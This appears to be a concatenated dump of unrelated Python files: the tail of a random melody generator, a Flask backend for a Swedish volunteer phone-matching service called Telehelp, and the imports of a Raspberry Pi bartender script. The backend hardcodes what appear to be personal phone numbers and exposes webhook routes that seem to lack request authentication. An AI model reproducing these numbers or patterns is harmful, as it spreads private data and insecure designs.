NOTE_LENGTH_STEP = 50
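# Quick sanity check of the equal-temperament table above (a sketch): NOTES[30] is f0 itself
# (x == 0), and twelve semitone steps multiply the frequency by a**12 == 2, i.e. one octave.
# The note-length constants are in milliseconds and are divided by 1000 where they are used below.
assert abs(NOTES[30] - f0) < 1e-9
assert abs(NOTES[42] / NOTES[30] - 2.0) < 1e-9  # 440 Hz -> 880 Hz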
class Note:
def __init__(self, frequency, duration):
self.frequency = frequency
self.duration = duration
def play(self):
sine(frequency=self.frequency, duration=self.duration)
class Phrase:
def __init__(self, length, max_time_length):
self.notes = []
self.length = length
self.max_time_length = max_time_length
self.time_length = 0
self.seed = random.choice(range(3, len(NOTES)-3, 1))
self.note_set = NOTES[self.seed-3:self.seed+4]
def is_full(self):
return self.time_remaining() <= 0
def add_note(self, frequency, duration):
if self.time_remaining() < MIN_NOTE_LENGTH/1000:
new_note_duration = duration + self.time_remaining()
self.notes.append(Note(frequency, new_note_duration))
self.time_length += new_note_duration
elif duration > self.time_remaining():
new_note_duration = self.time_remaining()
self.notes.append(Note(frequency, new_note_duration))
self.time_length += new_note_duration
else:
self.notes.append(Note(frequency, duration))
self.time_length += duration
def play(self):
total = 0.0
for n in self.notes:
n.play()
print("N: {}".format(n.duration))
total += n.duration
print("TOTAL: {}".format(total))
print("END OF PHRASE")
def time_remaining(self):
return self.max_time_length - self.time_length
def pick_note(self):
return random.choice(self.note_set)
NUMBER_OF_PHRASES = 4
PHRASE_LENGTH = range(5, 10, 1)
def play_voice():
phrases = []
for i in range(NUMBER_OF_PHRASES):
phrase = Phrase(random.choice(PHRASE_LENGTH), 5.0)
while not phrase.is_full():
freq = phrase.pick_note()
dur = random.randrange(MIN_NOTE_LENGTH, MAX_NOTE_LENGTH, NOTE_LENGTH_STEP)/1000.0
phrase.add_note(freq, dur)
phrases.append(phrase)
for phrase in phrases:
phrase.play()
if __name__ == '__main__':
multiprocessing.freeze_support()
p = multiprocessing.Process(target=play_voice)
p.start()
play_voice()
p.join()
|
api.py
|
import json
import logging
import os
import random
import secrets
import socket
import string
import threading
import time
import urllib.parse
import uuid
from collections import Counter
from collections import defaultdict
from pprint import pprint
import pandas as pd
import requests
from flask import abort
from flask import Flask
from flask import redirect
from flask import request
from flask import session
from flask import url_for
from flask_session import Session
from .checkMedia import checkPayload
from .databaseIntegration import clearCustomerHelperPairing
from .databaseIntegration import createNewCallHistory
from .databaseIntegration import deleteFromDatabase
from .databaseIntegration import fetchData
from .databaseIntegration import fetchHelper
from .databaseIntegration import readActiveCustomer
from .databaseIntegration import readActiveHelper
from .databaseIntegration import readCallHistory
from .databaseIntegration import readNameByNumber
from .databaseIntegration import readNewConnectionInfo
from .databaseIntegration import readZipcodeFromDatabase
from .databaseIntegration import saveCustomerToDatabase
from .databaseIntegration import saveHelperToDatabase
from .databaseIntegration import userExists
from .databaseIntegration import writeActiveCustomer
from .databaseIntegration import writeActiveHelper
from .databaseIntegration import writeCallHistory
from .databaseIntegration import writeCustomerAnalytics
from .databaseIntegration import writeHelperAnalytics
from .schemas import REGISTRATION_SCHEMA
from .schemas import VERIFICATION_SCHEMA
from .text2speech_utils import generateNameSoundByte
from .zipcode_utils import getCity
from .zipcode_utils import getDistanceApart
from .zipcode_utils import getDistrict
from .zipcode_utils import readZipCodeData
app = Flask(__name__, static_folder="../client/build", static_url_path="/")
SESSION_TYPE = "redis"
SECRET_KEY = os.getenv("SECRET_KEY")
app.config.from_object(__name__)
Session(app)
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
handler = logging.FileHandler("flask.log")
handler.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
log.addHandler(handler)
startTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
log.info(f"New log entry {startTime}")
BASE_URL = os.getenv("BASE_URL")
ELK_NUMBER = os.getenv("ELK_NUMBER")
API_USERNAME = os.getenv("API_USERNAME")
API_PASSWORD = os.getenv("API_PASSWORD")
DATABASE = os.getenv("DATABASE")
DATABASE_KEY = os.getenv("DATABASE_KEY")
HOOK_URL = os.getenv("HOOK_URL")
def checkEnv(envVar, envStr):
if envVar is None:
print(f"Warning! An environmental variable is not set {envStr}")
log.warning(f"Warning! An environmental variable is not set {envStr}")
# Checks if the environmental variables are set
checkEnv(BASE_URL, "BASE_URL")
checkEnv(ELK_NUMBER, "ELK_NUMBER")
checkEnv(API_USERNAME, "API_USERNAME")
checkEnv(API_PASSWORD, "API_PASSWORD")
checkEnv(DATABASE, "DATABASE")
checkEnv(DATABASE_KEY, "DATABASE_KEY")
checkEnv(SECRET_KEY, "SECRET_KEY")
checkEnv(HOOK_URL, "HOOK_URL")
ZIPDATA = "SE.txt"
MEDIA_URL = "https://files.telehelp.se/sv"
ELK_BASE = "https://api.46elks.com"
VERIFICATION_EXPIRY_TIME = 5 * 60 # 5 minutes
LOCATION_DICT, DISTRICT_DICT, CITY_DICT = readZipCodeData(ZIPDATA)
print("Site phone number: " + ELK_NUMBER)
def canonicalize_number(phone_number):
if phone_number[0] == "0":
phone_number = "+46" + phone_number[1:]
return phone_number
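# e.g. canonicalize_number("0701234567") -> "+46701234567"; numbers already in +46 form pass through unchanged.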
@app.route("/")
def index():
return app.send_static_file("index.html")
# ------------------------------ PHONE API ----------------------------------------------------
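# The payloads returned below follow the 46elks "voice_start" format as it is used throughout this
# file (a sketch of the shape, inferred from the handlers below; not an exhaustive API description):
#
#     {
#         "ivr": MEDIA_URL + "/ivr/some_prompt.mp3",   # play a prompt and collect key presses
#         "digits": 1,                                  # number of digits to collect
#         "skippable": "true",                          # the prompt may be skipped
#         "1": BASE_URL + "/api/...",                   # webhook to call for each pressed digit
#         "next": BASE_URL + "/api/...",                # fallback / follow-up webhook (URL or nested dict)
#     }
#
# "play" plays a sound without collecting digits, "connect"/"callerid" bridge the call to another
# number, and "whenhangup" points at a webhook that is called when the call ends.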
@app.route("/api/receiveCall", methods=["POST"])
def receiveCall():
callId = request.form.get("callid")
startTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
telehelpCallId = str(uuid.uuid1())
createNewCallHistory(DATABASE, DATABASE_KEY, callId)
from_sender = request.form.get("from")
print(from_sender)
# For registered helpers
if userExists(DATABASE, DATABASE_KEY, from_sender, "helper"):
print("Registered helper")
writeHelperAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["telehelp_callid", "elks_callid", "call_start_time"],
(telehelpCallId, callId, startTime),
)
activeCustomer = readActiveCustomer(DATABASE, DATABASE_KEY, from_sender)
print(activeCustomer)
if activeCustomer is None:
payload = {
"ivr": f"{MEDIA_URL}/ivr/hjalper_ingen.mp3",
"skippable": "true",
"digits": 1,
"2": BASE_URL + "/support",
"1": {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeHelper/%s" % telehelpCallId,
},
"next": BASE_URL + "/api/receiveCall",
}
else:
payload = {
"ivr": MEDIA_URL + "/ivr/registrerad_volontar.mp3",
"digits": 1,
"1": BASE_URL + "/api/handleReturningHelper/%s" % telehelpCallId,
"2": {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeHelper/%s" % telehelpCallId,
},
"3": BASE_URL + "/api/support",
"next": BASE_URL + "/api/receiveCall",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
# For registered customers
elif userExists(DATABASE, DATABASE_KEY, from_sender, "customer"):
print("Registered customer")
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["telehelp_callid", "elks_callid", "call_start_time", "new_customer"],
(telehelpCallId, callId, startTime, "False"),
)
# Get name of person to suggest call to from DB
helperNumber = readActiveHelper(DATABASE, DATABASE_KEY, from_sender)
name = readNameByNumber(DATABASE, DATABASE_KEY, helperNumber)
if name is None:
payload = {
"ivr": MEDIA_URL + "/ivr/ensam_gamling.mp3",
"digits": 1,
"1": BASE_URL + "/api/handleLonelyCustomer/%s" % telehelpCallId,
"2": BASE_URL + "/api/removeCustomer",
"3": BASE_URL + "/api/support",
"next": BASE_URL + "/api/receiveCall",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
else:
            nameEncoded = urllib.parse.quote(name)  # åäö etc. are not URL-safe and would otherwise crash the request
            # Make sure the name sound byte already exists (generate it if somehow missing, e.g. for early volunteers)
if not os.path.isfile("/media/name/" + nameEncoded + ".mp3"):
generateNameSoundByte(name)
payload = {
"play": MEDIA_URL + "/ivr/behover_hjalp.mp3",
"next": {
"play": MEDIA_URL + "/name/" + nameEncoded + ".mp3",
"next": {
"ivr": MEDIA_URL + "/ivr/pratade_sist.mp3",
"digits": 1,
"1": BASE_URL + "/api/handleReturningCustomer/%s" % telehelpCallId,
"2": BASE_URL + "/api/handleReturningCustomer/%s" % telehelpCallId,
"3": BASE_URL + "/api/handleReturningCustomer/%s" % telehelpCallId,
"4": BASE_URL + "/api/support",
"next": BASE_URL + "/api/receiveCall",
},
},
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
# New customer
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["telehelp_callid", "elks_callid", "call_start_time", "new_customer"],
(telehelpCallId, callId, startTime, "True"),
)
payload = {
"ivr": MEDIA_URL + "/ivr/info.mp3",
"skippable": "true",
"digits": 1,
"1": BASE_URL + "/api/handleNumberInput/%s" % telehelpCallId,
"2": BASE_URL + "/api/receiveCall",
"3": BASE_URL + "/api/support",
"next": BASE_URL + "/api/receiveCall",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
@app.route("/api/customerHangup/<string:telehelpCallId>", methods=["POST", "GET"])
def customerHangup(telehelpCallId):
print("hangup")
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeCustomerAnalytics(
DATABASE, DATABASE_KEY, telehelpCallId, ["call_end_time"], (endTime, telehelpCallId)
)
return ""
@app.route("/api/helperHangup/<string:telehelpCallId>", methods=["POST", "GET"])
def helperHangup(telehelpCallId):
print("hangup")
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeHelperAnalytics(DATABASE, DATABASE_KEY, telehelpCallId, ["call_end_time"], (endTime, telehelpCallId))
return ""
@app.route("/api/handleReturningHelper/<string:telehelpCallId>", methods=["POST"])
def handleReturningHelper(telehelpCallId):
print(request.form.get("result"))
number = int(request.form.get("result"))
if number == 1:
writeHelperAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["contacted_prev_customer", "deregistered"],
("True", "False", telehelpCallId),
)
payload = {
"play": MEDIA_URL + "/ivr/du_kopplas.mp3",
"next": BASE_URL + "/api/callExistingCustomer/%s" % telehelpCallId,
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
elif number == 2:
payload = {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeHelper/%s" % telehelpCallId,
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
@app.route("/api/callExistingCustomer/<string:telehelpCallId>", methods=["POST"])
def callExistingCustomer(telehelpCallId):
helperPhone = request.form.get("from")
customerPhone = readActiveCustomer(DATABASE, DATABASE_KEY, helperPhone)
payload = {
"connect": customerPhone,
"callerid": ELK_NUMBER,
"whenhangup": BASE_URL + "/api/helperHangup/%s" % telehelpCallId,
}
return json.dumps(payload)
@app.route("/api/removeHelper/<string:telehelpCallId>", methods=["POST"])
def removeHelper(telehelpCallId):
from_sender = request.form.get("from")
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeHelperAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["call_end_time", "contacted_prev_customer", "deregistered"],
(endTime, "False", "True", telehelpCallId),
)
deleteFromDatabase(DATABASE, DATABASE_KEY, from_sender, "helper")
return ""
@app.route("/api/handleReturningCustomer/<string:telehelpCallId>", methods=["POST"])
def handleReturningCustomer(telehelpCallId):
print(request.form.get("result"))
number = int(request.form.get("result"))
phone = request.form.get("from")
if number == 1:
payload = {
"play": MEDIA_URL + "/ivr/du_kopplas.mp3",
"skippable": "true",
"next": BASE_URL + "/api/callExistingHelper/%s" % telehelpCallId,
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
if number == 2:
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["used_prev_helper", "deregistered"],
("False", "False", telehelpCallId),
)
zipcode = readZipcodeFromDatabase(DATABASE, DATABASE_KEY, phone, "customer")
payload = {
"play": MEDIA_URL + "/ivr/vi_letar.mp3",
"skippable": "true",
"next": BASE_URL + "/api/postcodeInput/%s/%s" % (zipcode, telehelpCallId),
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
if number == 3:
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["used_prev_helper", "deregistered"],
("False", "True", telehelpCallId),
)
payload = {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeCustomer",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
return ""
@app.route("/api/handleLonelyCustomer/<string:telehelpCallId>", methods=["POST"])
def handleLonelyCustomer(telehelpCallId):
print(request.form.get("result"))
number = int(request.form.get("result"))
phone = request.form.get("from")
if number == 1:
zipcode = readZipcodeFromDatabase(DATABASE, DATABASE_KEY, phone, "customer")
payload = {
"play": MEDIA_URL + "/ivr/vi_letar.mp3",
"skippable": "true",
"next": BASE_URL + "/api/postcodeInput/%s/%s" % (zipcode, telehelpCallId),
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
if number == 2:
writeCustomerAnalytics(
DATABASE, DATABASE_KEY, telehelpCallId, ["deregistered"], ("True", telehelpCallId)
)
payload = {
"play": MEDIA_URL + "/ivr/avreg_confirmed.mp3",
"next": BASE_URL + "/api/removeCustomer",
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
return ""
@app.route("/api/callExistingHelper/<string:telehelpCallId>", methods=["POST"])
def callExistingHelper(telehelpCallId):
customerPhone = request.form.get("from")
helperPhone = readActiveHelper(DATABASE, DATABASE_KEY, customerPhone)
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["used_prev_helper", "deregistered"],
("True", "False", telehelpCallId),
)
payload = {
"connect": helperPhone,
"callerid": ELK_NUMBER,
"whenhangup": BASE_URL + "/api/customerHangup/%s" % telehelpCallId,
}
return json.dumps(payload)
@app.route("/api/postcodeInput/<string:zipcode>/<string:telehelpCallId>", methods=["POST"])
def postcodeInput(zipcode, telehelpCallId):
callId = request.form.get("callid")
phone = request.form.get("from")
# TODO: Add sound if zipcode is invalid (n/a)
district = getDistrict(int(zipcode), DISTRICT_DICT)
timestr = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
saveCustomerToDatabase(DATABASE, DATABASE_KEY, phone, str(zipcode), district, timestr)
print("zipcode: ", zipcode)
closestHelpers = fetchHelper(DATABASE, DATABASE_KEY, district, zipcode, LOCATION_DICT)
    # If the customer already has a helper, remove that helper from closestHelpers,
    # since the customer has chosen to look for a new one.
helperPhone = readActiveHelper(DATABASE, DATABASE_KEY, phone)
print(f"Helperphone: {helperPhone}")
print(f"closestHelpers: {closestHelpers}")
if helperPhone is not None:
if closestHelpers is not None and helperPhone in closestHelpers:
closestHelpers.remove(helperPhone)
writeActiveCustomer(DATABASE, DATABASE_KEY, helperPhone, None)
writeCallHistory(DATABASE, DATABASE_KEY, callId, "closest_helpers", json.dumps(closestHelpers))
if closestHelpers is None:
writeCustomerAnalytics(
DATABASE, DATABASE_KEY, telehelpCallId, ["n_helpers_contacted"], ("0", telehelpCallId)
)
payload = {"play": MEDIA_URL + "/ivr/finns_ingen.mp3"}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
else:
writeCallHistory(DATABASE, DATABASE_KEY, callId, "hangup", "False")
payload = {
"play": MEDIA_URL + "/ivr/ringer_tillbaka.mp3",
"skippable": "true",
"next": BASE_URL + "/api/call/0/%s/%s/%s" % (callId, phone, telehelpCallId),
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
@app.route(
"/api/call/<int:helperIndex>/<string:customerCallId>/<string:customerPhone>/<string:telehelpCallId>",
methods=["POST"],
)
def call(helperIndex, customerCallId, customerPhone, telehelpCallId):
# NOTE: When making changes here, also update /callSupport :)
stopCalling = readCallHistory(DATABASE, DATABASE_KEY, customerCallId, "hangup")
if stopCalling == "True":
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["call_end_time", "n_helpers_contacted"],
(endTime, str(helperIndex), telehelpCallId),
)
return ""
else:
print("helperIndex:", helperIndex)
print("Customer callId: ", customerCallId)
closestHelpers = json.loads(readCallHistory(DATABASE, DATABASE_KEY, customerCallId, "closest_helpers"))
print("closest helpers: ", closestHelpers)
auth = (API_USERNAME, API_PASSWORD)
if helperIndex >= len(closestHelpers):
writeCallHistory(DATABASE, DATABASE_KEY, customerCallId, "hangup", "True")
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["n_helpers_contacted"],
(str(helperIndex), telehelpCallId),
)
return redirect(
url_for("callBackToCustomer", customerPhone=customerPhone, telehelpCallId=telehelpCallId)
)
print(closestHelpers[helperIndex])
print(ELK_NUMBER)
payload = {
"ivr": MEDIA_URL + "/ivr/hjalte.mp3",
"timeout": "30",
"1": BASE_URL + "/api/connectUsers/%s/%s/%s" % (customerPhone, customerCallId, telehelpCallId),
"2": BASE_URL
+ "/api/call/%s/%s/%s/%s" % (str(helperIndex + 1), customerCallId, customerPhone, telehelpCallId),
"next": BASE_URL
+ "/api/call/%s/%s/%s/%s" % (str(helperIndex + 1), customerCallId, customerPhone, telehelpCallId),
}
checkPayload(payload, MEDIA_URL, log=log)
print("Calling: ", closestHelpers[helperIndex])
fields = {
"from": ELK_NUMBER,
"to": closestHelpers[helperIndex],
"voice_start": json.dumps(payload),
"whenhangup": BASE_URL
+ "/api/call/%s/%s/%s/%s" % (str(helperIndex + 1), customerCallId, customerPhone, telehelpCallId),
}
response = requests.post(ELK_BASE + "/a1/calls", data=fields, auth=auth)
print(response.text)
return ""
@app.route("/api/callBackToCustomer/<string:customerPhone>/<string:telehelpCallId>", methods=["POST", "GET"])
def callBackToCustomer(customerPhone, telehelpCallId):
print("No one found")
auth = (API_USERNAME, API_PASSWORD)
payload = {"play": MEDIA_URL + "/ivr/ingen_hittad.mp3"}
fields = {"from": ELK_NUMBER, "to": customerPhone, "voice_start": json.dumps(payload)}
requests.post(ELK_BASE + "/a1/calls", data=fields, auth=auth)
endTime = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
writeCustomerAnalytics(
DATABASE,
DATABASE_KEY,
telehelpCallId,
["call_end_time", "match_found"],
(endTime, "False", telehelpCallId),
)
return ""
@app.route("/api/removeCustomer", methods=["POST"])
def removeCustomer():
from_sender = request.form.get("from")
deleteFromDatabase(DATABASE, DATABASE_KEY, from_sender, "customer")
return ""
@app.route("/api/handleNumberInput/<string:telehelpCallId>", methods=["POST"])
def handleNumberInput(telehelpCallId):
print(request.form.get("result"))
number = int(request.form.get("result"))
print("number: ", number)
print("Write your zipcode")
payload = {
"play": MEDIA_URL + "/ivr/post_nr.mp3",
"next": {
"ivr": MEDIA_URL + "/ivr/bep.mp3",
"digits": 5,
"next": BASE_URL + "/api/checkZipcode/%s" % telehelpCallId,
},
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
return ""
@app.route("/api/checkZipcode/<string:telehelpCallId>", methods=["POST"])
def checkZipcode(telehelpCallId):
zipcode = request.form.get("result")
callId = request.form.get("callid")
city = getCity(int(zipcode), CITY_DICT)
cityEncoded = urllib.parse.quote(city)
print("zipcode: ", zipcode)
print("callId: ", callId)
print("city: ", city)
print("cityEnc: ", cityEncoded)
payload = {
"play": MEDIA_URL + "/ivr/du_befinner.mp3",
"next": {
"play": MEDIA_URL + "/city/" + cityEncoded + ".mp3",
"next": {
"ivr": MEDIA_URL + "/ivr/stammer_det.mp3",
"1": BASE_URL + f"/api/postcodeInput/{zipcode}/{telehelpCallId}",
"2": BASE_URL + "/api/handleNumberInput/%s" % telehelpCallId,
"next": BASE_URL + "/api/handleNumberInput/%s" % telehelpCallId,
},
},
}
checkPayload(payload, MEDIA_URL, log=log)
return json.dumps(payload)
@app.route(
"/api/connectUsers/<string:customerPhone>/<string:customerCallId>/<string:telehelpCallId>",
methods=["POST"],
)
def connectUsers(customerPhone, customerCallId, telehelpCallId):
helperPhone = request.form.get("to")
print("helper: ", helperPhone)
print("Saving customer -> helper connection to database")
# TODO: check current active customer/helper and move to previous
writeCustomerAnalytics(DATABASE, DATABASE_KEY, telehelpCallId, ["match_found"], ("True", telehelpCallId))
# writeCustomerAnalytics(DATABASE, DATABASE_KEY, telehelpCallId, match_found="True")
writeActiveCustomer(DATABASE, DATABASE_KEY, helperPhone, customerPhone)
writeActiveHelper(DATABASE, DATABASE_KEY, customerPhone, helperPhone)
writeCallHistory(DATABASE, DATABASE_KEY, customerCallId, "hangup", "True")
print("Connecting users")
print("customer:", customerPhone)
if HOOK_URL is not None:
res = readNewConnectionInfo(DATABASE, DATABASE_KEY, helperPhone)[0]
requests.post(
HOOK_URL, {"content": f"{res[0]} från {res[1]} har fått kontakt med någon som behöver hjälp!"}
)
payload = {"connect": customerPhone, "callerid": ELK_NUMBER, "timeout": "15"}
# Send a delayed SMS asking for a response on whether assignment accepted
print("Preparing to send SMS to connected volunteer.")
smsThread = threading.Thread(target=sendAskIfHelpingSms, args=(helperPhone,))
smsThread.start()
return json.dumps(payload)
def sendAskIfHelpingSms(volunteerNumber):
time.sleep(60)
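    # The SMS below is in Swedish; roughly: "Hopefully you can help the person you just spoke to.
    # Call Telehelp on 0766861551 to reach them again if needed. Reply TILLGÄNGLIG (available) if
    # you could not help or are done with the task, and we will make you available for new
    # assignments. Note that neither of you will be able to reach the other again if you do this.
    # Thank you for your effort!"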
msg = "Förhoppningsvis kan du hjälpa personen du precis pratade med. \
Ring till Telehelp på 0766861551 för att nå personen igen vid behov. \
Svara TILLGÄNGLIG om du inte kunde hjälpa till eller är klar med uppgiften, så gör \
vi dig tillgänglig för nya uppdrag. Observera att varken du eller den \
du hjälpt kommer kunna nå varandra igen om du gör detta. Tack för din insats!"
auth = (API_USERNAME, API_PASSWORD)
fields = {"from": ELK_NUMBER, "to": volunteerNumber, "message": msg}
requests.post(ELK_BASE + "/a1/sms", auth=auth, data=fields)
print("Sent confirmation SMS to volunteer: " + volunteerNumber)
@app.route("/api/receiveSms", methods=["POST"])
def receiveSms():
volunteerNumber = request.form.get("from")
response = request.form.get("message").strip().upper()
print("SMS received: " + response + " from " + volunteerNumber)
if response == "TILLGÄNGLIG":
# Clear database pairing to make volunteer available again. Remove volunteer from customer side too.
clearCustomerHelperPairing(DATABASE, DATABASE_KEY, volunteerNumber)
    # Your webhook code must respond with an HTTP status in the range 200-204.
return ""
# -------------------------------------------------------------------------------------------------
@app.route("/register", methods=["POST"])
def register():
data = request.json
if REGISTRATION_SCHEMA.is_valid(data):
validated = REGISTRATION_SCHEMA.validate(data)
city = getDistrict(validated["zipCode"], DISTRICT_DICT)
phone_number = canonicalize_number(validated["phoneNumber"])
if city == "n/a":
return {"type": "failure", "message": "Invalid zip"}
if userExists(DATABASE, DATABASE_KEY, phone_number, "helper"):
return {"type": "failure", "message": "User already exists"}
code = "".join(secrets.choice(string.digits) for _ in range(6))
auth = (API_USERNAME, API_PASSWORD)
fields = {"from": "Telehelp", "to": phone_number, "message": code}
requests.post(ELK_BASE + "/a1/sms", auth=auth, data=fields)
session[phone_number] = {
"zipCode": validated["zipCode"],
"name": validated["helperName"],
"city": city,
"timestamp": int(time.time()),
"code": code,
}
return {"type": "success"}
return {"type": "failure"}
@app.route("/verify", methods=["POST"])
def verify():
data = request.json
if VERIFICATION_SCHEMA.is_valid(data):
validated = VERIFICATION_SCHEMA.validate(data)
phone_number = canonicalize_number(validated["number"])
code = validated["verificationCode"]
if (
phone_number in session
and int(time.time()) - session[phone_number]["timestamp"] < VERIFICATION_EXPIRY_TIME
and code == session[phone_number]["code"]
):
sess = session[phone_number]
name = sess["name"]
zipcode = sess["zipCode"]
city = sess["city"]
if HOOK_URL is not None:
requests.post(HOOK_URL, {"content": f"{name} från {city} har registrerat sig som volontär!"})
log.info(f"Saving helper to database {name}, {phone_number}, {zipcode}, {city}")
timestr = time.strftime("%Y-%m-%d:%H-%M-%S", time.gmtime())
saveHelperToDatabase(DATABASE, DATABASE_KEY, name, phone_number, zipcode, city, timestr)
# TODO: Remove soundbyte if user quits?
urlEscapedName = urllib.parse.quote(name)
mediaPath = os.path.join("/", "media", f"{urlEscapedName}.mp3")
if not os.path.isfile(mediaPath) and os.getenv("GOOGLE_APPLICATION_CREDENTIALS") is not None:
generateNameSoundByte(name)
return {"type": "success"}
return {"type": "failure"}
@app.route("/getVolunteerLocations", methods=["GET"])
def getVolunteerLocations():
query = "SELECT zipcode FROM user_helpers"
volunteer_zipcodes_df = fetchData(DATABASE, DATABASE_KEY, query, params=None)["zipcode"]
district_data = defaultdict(list)
c = Counter(volunteer_zipcodes_df)
for zipCode, count in c.most_common():
z = int(zipCode) # Should change this to use string if we have the time
district = DISTRICT_DICT.get(z)
entry = {
"coordinates": LOCATION_DICT.get(z),
"city": CITY_DICT.get(z),
"zipcode": zipCode,
"count": count,
}
district_data[district].append(entry)
return {
"total": sum(c.values()),
"locations": [{"district": key, "data": val} for key, val in district_data.items()],
}
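# Response shape (a sketch with illustrative values, following the dict built above):
#
#     {"total": 2,
#      "locations": [{"district": "Stockholm",
#                     "data": [{"coordinates": ..., "city": "...", "zipcode": "11122", "count": 2}]}]}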
#################### TELEHELP SUPPORT FUNCTIONS ###########################
@app.route("/api/support", methods=["POST"])
def support():
# Call the Telehelp team in randomized order
callId = request.form.get("callid")
phone = request.form.get("from")
# J, T, DEr
supportTeam = ["+46737600282", "+46707812741"]
random.shuffle(supportTeam) # Randomize order to spread load
writeCallHistory(DATABASE, DATABASE_KEY, callId, "closest_helpers", json.dumps(supportTeam))
writeCallHistory(DATABASE, DATABASE_KEY, callId, "hangup", "False")
payload = {
"play": MEDIA_URL + "/ivr/ringer_tillbaka_support.mp3",
"skippable": "true",
"next": BASE_URL + "/api/callSupport/0/%s/%s" % (callId, phone),
}
return json.dumps(payload)
@app.route("/api/callSupport/<int:helperIndex>/<string:supportCallId>/<string:supportPhone>", methods=["POST"])
def callSupport(helperIndex, supportCallId, supportPhone):
stopCalling = readCallHistory(DATABASE, DATABASE_KEY, supportCallId, "hangup")
if stopCalling == "True":
return ""
else:
print("supportTeamIndex:", helperIndex)
print("Support customer callId: ", supportCallId)
supportTeamList = json.loads(readCallHistory(DATABASE, DATABASE_KEY, supportCallId, "closest_helpers"))
print("closest helpers: ", supportTeamList)
auth = (API_USERNAME, API_PASSWORD)
if helperIndex >= len(supportTeamList):
writeCallHistory(DATABASE, DATABASE_KEY, supportCallId, "hangup", "True")
return redirect(url_for("callBackToSupportCustomer", supportPhone=supportPhone))
print(supportTeamList[helperIndex])
print(ELK_NUMBER)
# TODO: Handle if call is not picked up
payload = {
"ivr": MEDIA_URL + "/ivr/hjalte_support.mp3",
"timeout": "30",
"1": BASE_URL + "/api/connectUsersSupport/%s/%s" % (supportPhone, supportCallId),
"2": BASE_URL + "/api/callSupport/%s/%s/%s" % (str(helperIndex + 1), supportCallId, supportPhone),
"next": BASE_URL
+ "/api/callSupport/%s/%s/%s" % (str(helperIndex + 1), supportCallId, supportPhone),
}
print("Calling: ", supportTeamList[helperIndex])
fields = {
"from": ELK_NUMBER,
"to": supportTeamList[helperIndex],
"voice_start": json.dumps(payload),
"whenhangup": BASE_URL
+ "/api/callSupport/%s/%s/%s" % (str(helperIndex + 1), supportCallId, supportPhone),
}
response = requests.post(ELK_BASE + "/a1/calls", data=fields, auth=auth)
print(response.text)
return ""
@app.route("/api/callBackToSupportCustomer/<string:supportPhone>", methods=["POST", "GET"])
def callBackToSupportCustomer(supportPhone):
print("No support team person found")
auth = (API_USERNAME, API_PASSWORD)
payload = {"play": MEDIA_URL + "/ivr/ingen_hittad_support.mp3"}
fields = {"from": ELK_NUMBER, "to": supportPhone, "voice_start": json.dumps(payload)}
requests.post(ELK_BASE + "/a1/calls", data=fields, auth=auth)
return ""
@app.route("/api/connectUsersSupport/<string:customerPhone>/<string:customerCallId>", methods=["POST"])
def connectUsersSupport(customerPhone, customerCallId):
helperPhone = request.form.get("to")
print("support from: ", helperPhone)
writeCallHistory(DATABASE, DATABASE_KEY, customerCallId, "hangup", "True")
print("Connecting users")
print("customer:", customerPhone)
payload = {"connect": customerPhone, "callerid": ELK_NUMBER, "timeout": "15"}
return json.dumps(payload)
# -----------------------------------Test Functions-------------------------------------------------
@app.route("/testredirect/<int:numb>", methods=["POST", "GET"])
def testredirect(numb):
print(f"Redirect works:{numb}")
return "Redirect works"
@app.route("/testendpoint", methods=["GET"])
def testendpoint():
return redirect(url_for("testredirect", numb=1))
# --------------------------------------------------------------------------------------------------
|
bartender.py
|
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
#--------------Driver Library-----------------#
import OLED_Driver as OLED
import time
import sys
import RPi.GPIO as GPIO
import json
import traceback
import threading
import textwrap
import subprocess
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
from PIL import ImageColor
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
